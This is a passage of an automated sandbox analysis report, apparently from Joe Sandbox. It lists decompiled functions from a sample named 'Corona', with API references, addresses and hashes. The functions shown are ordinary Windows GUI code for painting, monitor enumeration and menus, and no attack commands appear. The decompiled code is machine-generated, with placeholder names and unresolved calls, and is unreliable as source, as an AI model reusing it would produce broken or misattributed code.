							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E004122C4(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t117 = _t117;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00428234( &_v56, 2);
					E00428188(_t117,  &_v56, _v12, 0,  &_v44);
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x42875e);
					_push(_v12);
					_t74 = E00434EF4(_v8);
					_push(_t74);
					L004065C4();
					return _t74;
				}
			}






















                                  0x004285fd
                                  0x004285ff
                                  0x00428605
                                  0x00428607
                                  0x0042860a
                                  0x00428617
                                  0x0042861f
                                  0x00428764
                                  0x00428625
                                  0x00428632
                                  0x00428647
                                  0x0042864f
                                  0x00428654
                                  0x00428655
                                  0x0042865a
                                  0x0042865f
                                  0x00428660
                                  0x00428665
                                  0x00428668
                                  0x00428672
                                  0x00428673
                                  0x00428674
                                  0x00428675
                                  0x00428676
                                  0x00428679
                                  0x00428686
                                  0x00428690
                                  0x0042869b
                                  0x004286a4
                                  0x004286b3
                                  0x004286cd
                                  0x004286d9
                                  0x004286da
                                  0x004286db
                                  0x004286dc
                                  0x004286dd
                                  0x004286ee
                                  0x004286ee
                                  0x00428690
                                  0x00428713
                                  0x0042871f
                                  0x00428732
                                  0x00428739
                                  0x0042873c
                                  0x0042873f
                                  0x00428747
                                  0x0042874b
                                  0x00428750
                                  0x00428751
                                  0x00428756
                                  0x00428756

                                  APIs
                                  • GetWindowLongA.USER32 ref: 00428617
                                  • GetWindowRect.USER32 ref: 00428632
                                  • OffsetRect.USER32(?,?,?), ref: 00428647
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428655
                                  • GetWindowLongA.USER32 ref: 00428686
                                  • GetSystemMetrics.USER32 ref: 0042869B
                                  • GetSystemMetrics.USER32 ref: 004286A4
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 004286B3
                                  • GetSysColorBrush.USER32(0000000F), ref: 004286E0
                                  • FillRect.USER32 ref: 004286EE
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00428757,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428713
                                  • 72E7B380.USER32(00000000,?,0042875E,?,?,00000000,00428757,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428751
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  • Opcode ID: acfc3fe2e8b866647af8dafadb9cb4f027873f2805ad8fb3bf6d4313365d82bf
                                  • Instruction ID: 3b879bb3a78fa01baf2ca47ee83fafe1d00829185c41c622d0afd6e45b2cf988
                                  • Opcode Fuzzy Hash: acfc3fe2e8b866647af8dafadb9cb4f027873f2805ad8fb3bf6d4313365d82bf
                                  • Instruction Fuzzy Hash: 22418671A001196FCB00EBA9DD82EDFB7BDEF49314F55016AF915F3181CA39AE018768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423D28, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00423D28(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x452927 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x452914 = E0042377C(7, _t60,  *0x452914, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                  0x00423d31
                                  0x00423d34
                                  0x00423d3e
                                  0x00423d6e
                                  0x00423d74
                                  0x00423e30
                                  0x00423e38
                                  0x00423e38
                                  0x00423d7c
                                  0x00423d81
                                  0x00423d8c
                                  0x00423d97
                                  0x00423d9c
                                  0x00423e05
                                  0x00423e1d
                                  0x00423e2e
                                  0x00423e19
                                  0x00423e19
                                  0x00423e19
                                  0x00000000
                                  0x00423e05
                                  0x00423da8
                                  0x00423db7
                                  0x00000000
                                  0x00000000
                                  0x00423dc9
                                  0x00423de1
                                  0x00423df7
                                  0x00000000
                                  0x00000000
                                  0x00423dfd
                                  0x00423dff
                                  0x00423dff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00423de1
                                  0x00423d52
                                  0x00423d67
                                  0x00000000

                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00423D61
                                  • GetSystemMetrics.USER32 ref: 00423D86
                                  • GetSystemMetrics.USER32 ref: 00423D91
                                  • GetClipBox.GDI32(?,?), ref: 00423DA3
                                  • GetDCOrgEx.GDI32(?,?), ref: 00423DB0
                                  • OffsetRect.USER32(?,?,?), ref: 00423DC9
                                  • IntersectRect.USER32 ref: 00423DDA
                                  • IntersectRect.USER32 ref: 00423DF0
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  • Opcode ID: fdf5b19602e1d1d84ce20019927f8b0e6bc31a3d31021bc76696daf60ebb7876
                                  • Instruction ID: 488668aaa4a8bc02af8f192befde7bd10cd9067d0b565877a04fb4b95f25e9da
                                  • Opcode Fuzzy Hash: fdf5b19602e1d1d84ce20019927f8b0e6bc31a3d31021bc76696daf60ebb7876
                                  • Instruction Fuzzy Hash: 2B312DB2E00219ABDB10DFA5D9459FFB7FCAB49301F414127E916E3241E63CDE058BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433084, Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00433084(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00431C90(_t83) != 0) {
						_t38 = E00432BA8(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L0040638C();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406034();
					_v12 = _t47;
					L004065C4();
					L0040603C();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E00434EF4(_t83),  &_v80);
					E0042F98C(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E00433084(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x4331d6, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406014();
					EndPaint(E00434EF4(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x4331dd);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                  0x00433085
                                  0x00433087
                                  0x0043308c
                                  0x0043308d
                                  0x0043308f
                                  0x00433098
                                  0x004330a4
                                  0x004330c3
                                  0x004330b1
                                  0x004330b7
                                  0x004330b7
                                  0x004331e3
                                  0x004330cd
                                  0x004330cf
                                  0x004330dd
                                  0x004330eb
                                  0x004330ee
                                  0x004330f3
                                  0x004330f8
                                  0x004330fe
                                  0x00433105
                                  0x0043310a
                                  0x0043311a
                                  0x00433128
                                  0x00433137
                                  0x0043314c
                                  0x00433154
                                  0x0043315b
                                  0x00433162
                                  0x00433179
                                  0x00433187
                                  0x0043318d
                                  0x0043318e
                                  0x00433190
                                  0x00433193
                                  0x004331a4
                                  0x004331ab
                                  0x004331ae
                                  0x004331b1
                                  0x004331be
                                  0x004331c7
                                  0x004331d5
                                  0x004331d5

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 004330CF
                                  • 72E7A520.GDI32(00000000,?), ref: 004330F3
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 004330FE
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00433105
                                  • SelectObject.GDI32(00000000,?), ref: 00433115
                                  • BeginPaint.USER32(00000000,?,00000000,004331D6,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00433137
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00433193
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004331A4
                                  • SelectObject.GDI32(00000000,?), ref: 004331BE
                                  • DeleteDC.GDI32(00000000), ref: 004331C7
                                  • DeleteObject.GDI32(?), ref: 004331D0
                                    • Part of subcall function 00432BA8: BeginPaint.USER32(00000000,?), ref: 00432BCE
                                    • Part of subcall function 00432BA8: EndPaint.USER32(00000000,?,00432CCF), ref: 00432CC2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  • API String ID: 3782911080-0
                                  • Opcode ID: 0486bd92f20255e6289c31b1768ef0f896f0cf9d103f96d7f3486dbff7413452
                                  • Instruction ID: 04b58143c4d95f2ac40a2222906dbed935243b195e210e6476a2e98dca96d502
                                  • Opcode Fuzzy Hash: 0486bd92f20255e6289c31b1768ef0f896f0cf9d103f96d7f3486dbff7413452
                                  • Instruction Fuzzy Hash: 7F412D71B00204AFDB00EFA9CC85BAEB7F8AF4D705F11447AB905EB285DA79AD058B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B0F0, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B0F0(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040AF68(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x451028; // 0x452048
				if( *_t14 == 0) {
					_t16 =  *0x450df8; // 0x406a7c
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x452664; // 0x400000
					LoadStringA(E00404EE8(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x450e48; // 0x452218
				E00402824(E004029A4(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00408270( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40b1b4, 2,  &_v1092, 0);
			}












                                  0x0040b0ff
                                  0x0040b104
                                  0x0040b10c
                                  0x0040b173
                                  0x0040b178
                                  0x0040b17c
                                  0x0040b187
                                  0x00000000
                                  0x0040b19d
                                  0x0040b10e
                                  0x0040b118
                                  0x0040b127
                                  0x0040b137
                                  0x0040b14a
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040AF68: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                    • Part of subcall function 0040AF68: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                    • Part of subcall function 0040AF68: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                    • Part of subcall function 0040AF68: LoadStringA.USER32 ref: 0040B05A
                                  • CharToOemA.USER32 ref: 0040B127
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B144
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B14A
                                  • GetStdHandle.KERNEL32(000000F4,0040B1B4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B15F
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B1B4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B165
                                  • LoadStringA.USER32 ref: 0040B187
                                  • MessageBoxA.USER32 ref: 0040B19D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID: H E$|j@
                                  • API String ID: 185507032-3863109007
                                  • Opcode ID: b12a580c6b142c498ea5481c8a438ba66d17c0dc0eb5e8fadf479bce1ee02783
                                  • Instruction ID: 602092cd2f81962656dcf9ec86cfa28024b13f80f769a7192508fb50f8f10f4d
                                  • Opcode Fuzzy Hash: b12a580c6b142c498ea5481c8a438ba66d17c0dc0eb5e8fadf479bce1ee02783
                                  • Instruction Fuzzy Hash: A31148B61043047ED200F7A5CC42F9F77ECAB45704F50453BB754E60E2DA78E9448BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432D00, Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00432D00(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E004136F8( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0041BF6C(0xff000010));
							E004122C4( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0041BF6C(0xff000014));
							E004122C4( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00413754(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E004136F8( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E004122C4( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E0042D130(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0042F98C(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                  0x00432d04
                                  0x00432d07
                                  0x00432d09
                                  0x00432d0b
                                  0x00432d14
                                  0x00432d32
                                  0x00432d32
                                  0x00432d35
                                  0x00432d3d
                                  0x00432e22
                                  0x00432e22
                                  0x00432e2a
                                  0x00432f2f
                                  0x00432f2f
                                  0x00432f2f
                                  0x00432e33
                                  0x00432e36
                                  0x00000000
                                  0x00000000
                                  0x00432e3d
                                  0x00432e41
                                  0x00432e43
                                  0x00432e4b
                                  0x00432e50
                                  0x00432e59
                                  0x00432e93
                                  0x00432eb6
                                  0x00432ec1
                                  0x00432ecb
                                  0x00432ee0
                                  0x00432f03
                                  0x00432f0e
                                  0x00432f18
                                  0x00432f18
                                  0x00432f1d
                                  0x00432f1e
                                  0x00432f1e
                                  0x00432f1e
                                  0x00000000
                                  0x00432e43
                                  0x00432d43
                                  0x00432d47
                                  0x00432d50
                                  0x00432d54
                                  0x00432d56
                                  0x00432d56
                                  0x00432d54
                                  0x00432d61
                                  0x00432d67
                                  0x00432d6d
                                  0x00432d7a
                                  0x00432d80
                                  0x00432dae
                                  0x00432dc0
                                  0x00432dc6
                                  0x00432dc8
                                  0x00432dc8
                                  0x00432dd4
                                  0x00432de0
                                  0x00432df2
                                  0x00432e02
                                  0x00432e0d
                                  0x00432e12
                                  0x00432e12
                                  0x00432dc0
                                  0x00432e18
                                  0x00432e19
                                  0x00432d6d

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  • API String ID: 375863564-0
                                  • Opcode ID: 375a3d3c59a100b4218cc78bae529fd36ac98dbf0caeeaf41ab0df3579928a21
                                  • Instruction ID: 505e0873328e877a758c9879b81cc4166d44244e70d46513b811bb36b8aff88b
                                  • Opcode Fuzzy Hash: 375a3d3c59a100b4218cc78bae529fd36ac98dbf0caeeaf41ab0df3579928a21
                                  • Instruction Fuzzy Hash: 26518B712042449FDB18EF29C9C1B5B7BE8AF49308F04446AFE99CB297D779E844CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044951C, Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044951C(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E00434EF4( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}





                                  0x00449523
                                  0x0044952d
                                  0x00449536
                                  0x00449540
                                  0x00449549
                                  0x00449553
                                  0x0044956c
                                  0x0044957b
                                  0x00449585
                                  0x00449592
                                  0x0044959f
                                  0x004495ac
                                  0x004495b9
                                  0x004495c6
                                  0x00000000
                                  0x004495d3
                                  0x004495e7
                                  0x004495f1
                                  0x004495f1
                                  0x004495f9
                                  0x00449603
                                  0x00000000
                                  0x0044960d
                                  0x00449603
                                  0x00449553
                                  0x00449540
                                  0x00449614

                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00449567
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00449585
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00449592
                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0044959F
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004495AC
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004495B9
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004495C6
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004495D3
                                  • EnableMenuItem.USER32 ref: 004495F1
                                  • EnableMenuItem.USER32 ref: 0044960D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  • API String ID: 3985193851-0
                                  • Opcode ID: 26681399ddf762fcb25506c3ac0ffada35ff116410d2c9e36948e023534304a5
                                  • Instruction ID: 1760c963e30467f436122c13352ed49cb30c5ce7ec0b26330787c074543c6f60
                                  • Opcode Fuzzy Hash: 26681399ddf762fcb25506c3ac0ffada35ff116410d2c9e36948e023534304a5
                                  • Instruction Fuzzy Hash: 9C214C703403047AE720AB65DC8FF5B7BD85B04B18F1540B9B6497F2D3C6B9B990965C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042E400, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042E400(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x42e5ac; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
